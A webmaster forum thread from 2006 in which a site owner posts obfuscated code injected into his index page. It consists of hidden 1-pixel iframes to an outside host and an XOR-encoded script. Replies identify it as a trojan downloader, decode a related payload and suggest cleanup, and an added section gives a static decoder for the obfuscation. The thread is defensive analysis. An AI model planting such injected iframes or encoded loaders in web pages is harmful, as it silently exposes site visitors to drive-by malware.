12-11-2006, 02:34 PM   #1
ER!C L!VE
Confirmed User
 
Join Date: Feb 2005
Location: WORLDW!DE
Posts: 724
Someone hacked my TGP and put this code on my index.html

Does anyone know what this code does? It could be a stats counter for all I know.. Any helpful input is appreciated.

<body bgcolor="#ffffff">
<iframe src='http://wsfgfdgrtyhgfd.net/adv/171/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=171' width=1 height=1></iframe><script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD% C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD %C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8 B%8B%C3%D4%C1%D6%C5%C4%C7%88%C7%CB%C9%8B%C6%C8%D0% 97%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2 %D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%C D%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tm p = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
</body>
</html>

Thanks in advance!

Eric
12-11-2006, 02:42 PM   #2
JD
Too lazy to set a custom title
 
Join Date: Sep 2003
Posts: 22,651
I've made numerous posts about this. Remove the iframe and javascript, then change all the system passwords as well as your trade script/thumb script pwds and you should be fine.

It's a bot of some sort that's doing it. I've been hit many many times and changing all the pwds was the only way it managed to stop.
12-11-2006, 02:43 PM   #3
jacked
sperm tail
 
Join Date: May 2004
Location: nj
Posts: 11,019
you got scumware on that box

HTML/TrojanDownloader.Agent.AU

do a search for

http://wsfgfdgrtyhgfd.net


Quote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

And more about it here:

http://www.aboutus.org/Wsfgfdgrtyhgfd.net
__________________
Got Cam Models?
icq: 361-607-616
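A static decoder for the obfuscated script in post #1, added here as an example and not written by any poster in this thread: it reverses the script's own transform (each %XX byte XORed with 0x25, then minus 127) without running it in a browser, and lists any 1-pixel iframes in the result. The function names and the sample payload with its placeholder.invalid host are constructed for illustration.

```javascript
// Static decoder for the "%XX" XOR-and-subtract obfuscation in the injected script.
// Nothing is evaluated or written to a DOM; the payload is only turned back into text.

// The script builds its key as the string '0x00' + '25'; the ^ operator coerces
// that string to the number 0x25 (37).
const KEY = Number('0x00' + '25');
const OFFSET = 127;

// Each %XX byte -> (byte ^ KEY) - OFFSET -> character. Whitespace is stripped first
// because forum software breaks long strings with spaces, sometimes mid-token.
function decodePayload(encoded) {
  const cleaned = encoded.replace(/\s+/g, '');
  const tokens = cleaned.match(/%[0-9A-Fa-f]{2}/g) || [];
  if (tokens.join('') !== cleaned) {
    throw new Error('payload contains data that is not %XX-encoded');
  }
  return tokens
    .map(t => String.fromCharCode((parseInt(t.slice(1), 16) ^ KEY) - OFFSET))
    .join('');
}

// Inverse transform, used only to build the constructed sample below.
function buildSample(text) {
  return [...text]
    .map(ch => '%' + ((ch.charCodeAt(0) + OFFSET) ^ KEY).toString(16).toUpperCase())
    .join('');
}

// List iframes in decoded markup and flag those sized to be invisible.
function findHiddenIframes(html) {
  const found = [];
  for (const m of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attr = name => {
      const a = new RegExp(name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(m[1]);
      return a ? a[1] : null;
    };
    const w = parseInt(attr('width'), 10);
    const h = parseInt(attr('height'), 10);
    found.push({ src: attr('src'), hidden: w <= 1 || h <= 1 });
  }
  return found;
}

// Constructed sample: placeholder host, not the payload from the thread.
const SAMPLE_HTML = '<iframe src="http://placeholder.invalid/x.php" width=1 height=1></iframe>';
// A space every 25 characters mimics the forum's wrapping of long strings.
const SAMPLE = buildSample(SAMPLE_HTML).replace(/(.{25})/g, '$1 ');
console.log(findHiddenIframes(decodePayload(SAMPLE)));
```

Passing the string assigned to `str1` in a saved copy of an infected page to `decodePayload` shows the markup the script would have written, without loading the page in a browser.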
12-11-2006, 02:44 PM   #4
ER!C L!VE
Confirmed User
 
Join Date: Feb 2005
Location: WORLDW!DE
Posts: 724
Fuck. Thanks bro.
12-11-2006, 03:12 PM   #5
Violetta
Affiliate
 
 
Join Date: Jul 2004
Posts: 28,735
Yeah... I've had trouble with that shit too! It is some kind of a trojan. Anyway, what I did was upgrade WordPress and change the password to my FTP! Never happened again after that!
__________________
M&A Queen